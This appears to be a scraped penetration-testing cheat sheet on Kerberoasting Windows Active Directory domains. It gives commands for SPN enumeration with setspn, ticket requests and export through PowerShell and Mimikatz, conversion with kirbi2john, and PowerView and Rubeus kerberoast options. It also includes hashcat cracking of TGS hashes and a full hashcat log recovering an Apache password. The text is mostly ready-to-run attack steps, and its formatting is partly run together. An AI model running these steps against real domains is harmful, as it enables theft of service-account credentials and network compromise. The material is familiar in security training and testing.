๐ชWindows - Kerberoasting
setspn.exe
Enumerating SPNs with setspn.exe
setspn.exe -Q */*Targeting a Single User
Add-Type -AssemblyName System.IdentityModelNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"Retrieving All Tickets Using setspn.exe
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }Note: We can also choose to retrieve all tickets using the same method, but this will also pull all computer accounts, so it is not optimal.
Mimikatz
Extracting Tickets from Memory with Mimikatz
Using 'mimikatz.log' for logfile : OK
mimikatz # base64 /out:true
isBase64InterceptInput is false
isBase64InterceptOutput is true
mimikatz # kerberos::list /export Preparing the Base64 Blob for Cracking
echo "<base64 blob>" | tr -d \\n Placing the Output into a File as .kirbi
cat encoded_file | base64 -d > sqldev.kirbikirbi2john.py
https://raw.githubusercontent.com/nidem/kerberoast/907bf234745fe907cf85f3fd916d1c14ab9d65c0/kirbi2john.py
Extracting the Kerberos Ticket using kirbi2john.py
python2.7 kirbi2john.py sqldev.kirbiHashcat
reference
Modifiying crack_file for Hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcatCracking the Hash with Hashcat
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txthashcat --example-hashes
code
hashcat --example-hashes | grep apr1example
โโโ(19:55:31 eoใฟoffsec)-[/usr/share/wordlists]
โโ$ hashcat --example-hashes | grep apr1
Name................: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Example.Hash........: $apr1$62722340$zGjeAwVP2KwY6MtumUI1N/
--user
code
hashcat -m 1600 .htpasswd /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt --userexample
โโโ(20:03:47 eoใฟoffsec)-[~/pgp/AuthBy]
โโ$ hashcat -m 1600 .htpasswd /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt --user
hashcat (v6.2.5) starting
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-11th Gen Intel(R) Core(TM) i7-1165G7 @ 2.80GHz, 2917/5899 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache built:
* Filename..: /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt
* Passwords.: 100000
* Bytes.....: 781879
* Keyspace..: 100000
* Runtime...: 0 secs
$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0:elite
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
Time.Started.....: Wed Dec 7 20:04:04 2022 (0 secs)
Time.Estimated...: Wed Dec 7 20:04:04 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 20697 H/s (11.85ms) @ Accel:256 Loops:250 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 5120/100000 (5.12%)
Rejected.........: 0/5120 (0.00%)
Restore.Point....: 4096/100000 (4.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidate.Engine.: Device Generator
Candidates.#1....: 12345678q -> amateurs
Hardware.Mon.#1..: Util: 32%
Started: Wed Dec 7 20:03:50 2022
Stopped: Wed Dec 7 20:04:06 2022Powerview
Using PowerView to Extract TGS Tickets
Import-Module .\PowerView.ps1Get-DomainUser * -spn | select samaccountnameUsing PowerView to Target a Specific User
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format HashcatExporting All Tickets to a CSV File
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformationRubeus
.\Rubeus.exeUsing the /stats Flag
.\Rubeus.exe kerberoast /statsUsing the /nowrap Flag
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrapUsing the /user Flag
.\Rubeus.exe kerberoast /user:testspn /nowrapUsing the /tgtdeleg Flag
.\Rubeus.exe kerberoast /tgtdeleg /user:testspn /nowrapNote:
When supplying the
/tgtdelegflag, the tool requested an RC4 ticket even though the supported encryption types are listed as AES 128/256Does not work against a Windows Server 2019 Domain Controller
Encryption Types
Encryption
Hash Type
RC24
$krb5tgs$23$*
AES-256
$krb5tgs$18$*
AES-128
$krb5tgs$17$*
msDS-SupportedEncryptionTypes
Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypesDecimal Value
Hex Value
0
0x0
Not defined - defaults to RC4_HMAC_MD5
Cracking the Ticket with Hashcat & rockyou.txt
hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txtChecking Supported Encryption Types
Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypesRequesting a New Ticket
.\Rubeus.exe kerberoast /user:testspn /nowrapRunning Hashcat & Checking the Status of the Cracking Job
hashcat -m 19700 aes_to_crack /usr/share/wordlists/rockyou.txtEdit Encryption Types
Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options
Network security: Configure encryption types allowed for Kerberos
Last updated